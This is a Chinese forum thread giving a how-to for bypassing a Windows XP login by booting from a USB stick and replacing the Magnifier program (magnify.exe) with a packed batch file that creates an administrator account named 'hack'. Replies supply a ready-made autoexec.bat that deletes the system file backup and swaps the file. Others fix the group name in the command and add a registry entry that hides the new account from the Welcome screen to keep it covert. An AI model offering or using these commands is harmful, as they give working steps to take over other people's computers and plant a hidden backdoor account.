[『技巧』] 用U盘绕过登录密码进入Windows XP系统

babykiss

用U盘绕过登录密码进入Windows XP系统
　　有许多朋友还在为忘记XP登陆密码不能进入系统而烦恼，现在我就来给你带来解决的方法.

　　所需工具
　　1.U盘一个
　　2.Usboot(U盘启动制作软件)

　　3.winrar(压缩软件)

　　这个方法我亲自实验过，并且成功的绕过了XP的登陆密码.我在学校机房做过实验，但是文件格式为FAT32，就不知道NTFS的行不行?本来想一起实验的，结果我的光驱在学校机器上用不起(我的光驱有问题，机器太老了!--穷)，学校的机器都是FAT32的，没办法!只有下次做了!

　　先说说思路:方法很简单，当你的机器出现登陆框，要求输入密码时，你按下windows键+U看看有什么反映……?不错!出现了辅助工具管理工具(呵呵~~意味着可以运行放大镜)。既然可以运行放大镜程序，那么我们把放大镜程序换成其他的程序是不是也可以运行呢?(我把它换成添加用户的程序不就…………呵呵~~好坏!)思路就是这样的了!现在我们开始制作。
　　①.制作U盘启动盘。先运行Usboot，然后插入U盘，选中U盘然后点开始。(要破坏U盘上的文件哦!小心!)，格式化完了把U盘拔了，然后它会提示你再插入，插入U盘1分后就可以了!我的U盘是1G的，用的HDD格式。
　　②.制作替换文件。要制作一个XX.EXE的文件来替换原文件，但是这个XX.EXE执行后又要达到添加用户的要求。我首先想到的是写一个批处理文件：
　　@net user hack 123456 /add

　　@net localgroup administraroes hack /add

　　@exit

　　然后保存为XX.bat就可以了!

　　又有人要问我了，我们要的是XX.EXE你却给我们弄个XX.bat你什么意思嘛?

　　问得好!我们让它运行XX.EXE就等同运行了XX.bat不就可以了嘛!

　　要达到这样的目的，就要用到winrar，用winrar制作一个自解压文件，不就把XX.bat变成XX.EXE了吗?运行XX.EXE就等同运行了XX.bat.(把XX.EXE拷到 U 盘上去)

　　③.替换文件.到COMS里去把第一启动换到USB-HDD，保存----插入U盘，进入系统的c:\windows\system32下去. copy magnify.exe 007magnify.exe (对magnify.exe进行备份，magnify.exe为放大镜执行程序).在把U盘上的XX.EXE拷到system32下，并该为 magnify.exe就可以了!

　　然后从硬盘启动就可以了!再到XP登陆密码时，你只要运行放大镜就可以了!按下Ctrl+Alt+Del(按2次)用你新建的hack用户就可以进去了!进去把管理员密码改过来吧!

　　这样就成功的绕过了XP的登陆密码，只要了一个U盘，好方便.

wuyuhuaghsd

呵呵，登录XP不用密码真是大好了！

IsaacZ

用下面的软件可以把 BAT 批处理程序变成 EXE：
[下载] 批处理到可执行文件转换器(WBatToExe) V2.1

如果最终目的是去除原来的用户密码，那么把 U盘制作成 WINPE 启动盘，然后在WINPE下运行破除密码的GUI程序会更简单一些。

yj615

用新用户进入系统，那些软件，系统设置都不是原来的，而且还挺麻烦。还是用风吟多功能WinPE系统3.0里的绕过系统登入验证，直接就进入且是原来帐户的设置，试过晨枫，天意，杏雨梨云，，，就风吟的有用。

伤心的笔

手动输入命令太麻烦，可以这样做：
将以下内容保存为autoexec.bat至U盘根目录：

1. @echo off
   
2. :改名
   
3. copy "C:\Windows\System32\magnify.exe" "C:\Windows\System32\007magnify.exe"
   
4. :去除文件的只读、系统及其他碍眼的属性
   
5. attrib  "C:\Windows\System32\magnify.exe" -a -s -h -r
   
6. attrib  "C:\Windows\System32\dllcache\magnify.exe" -a -s -h -r
   
7. :将System32文件夹及dllcache的备份删除
   
8. del "C:\Windows\System32\dllcache\magnify.exe" /Q
   
9. del "C:\Windows\System32\magnify.exe" /Q
   
10. :偷梁换柱
    
11. copy XX.exe "C:\Windows\System32\007magnify.exe"
    
12. echo It has finished.
    
13. echo on
    
14. @exit

复制代码

进入DOS后，便会自动执行替换操作，然后给你讯息。

伤心的笔

@babykiss ：不修改的话，创建的用户没有管理员权限！因为Administrators这个词你打成administraroes了！
@IsaacZ ：如果babykiss没有回应，请帮忙修改，谢谢！

一个十分严重的错误！
你的替换文件中有个词打错了
XX.bat修复后为

1. @echo off
   
2. net user hack 123456 /add
   
3. net localgroup Administrators hack /add
   
4. exit

复制代码

伤心的笔

补充一点，你创建的hack用户在欢迎屏幕、用户帐户中是可见的
可以这样做

1. Windows Registry Editor Version 5.00
   
2. 
   
3. [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList]
   
4. "hack"=dword:00000000
   
5. 
   

复制代码

这样的话，可以把XX.bat和XX.reg一起打包成XX.EXE，同时修改xx.bat为

1. @echo off
   
2. net user hack 123456 /add
   
3. net localgroup Administrators hack /add
   
4. regedt32 /s xx.reg
   
5. exit

复制代码

这样做出来的hack用户在欢迎屏幕、用户帐户中是不可见的，需要在欢迎屏幕中两次按下Ctrl+Alt+Del输入用户名和密码登录，更安全隐秘。

伤心的笔

yj615 发表于 2011-8-10 17:05

                               
登录/注册后可看大图

用新用户进入系统，那些软件，系统设置都不是原来的，而且还挺麻烦。还是用风吟多功能WinPE系统3.0里的绕过 ...

这个绕过验证后，用户的密码会被清空吗？

IsaacZ

这样做之前，最好征得机主的同意……{:soso_e127:}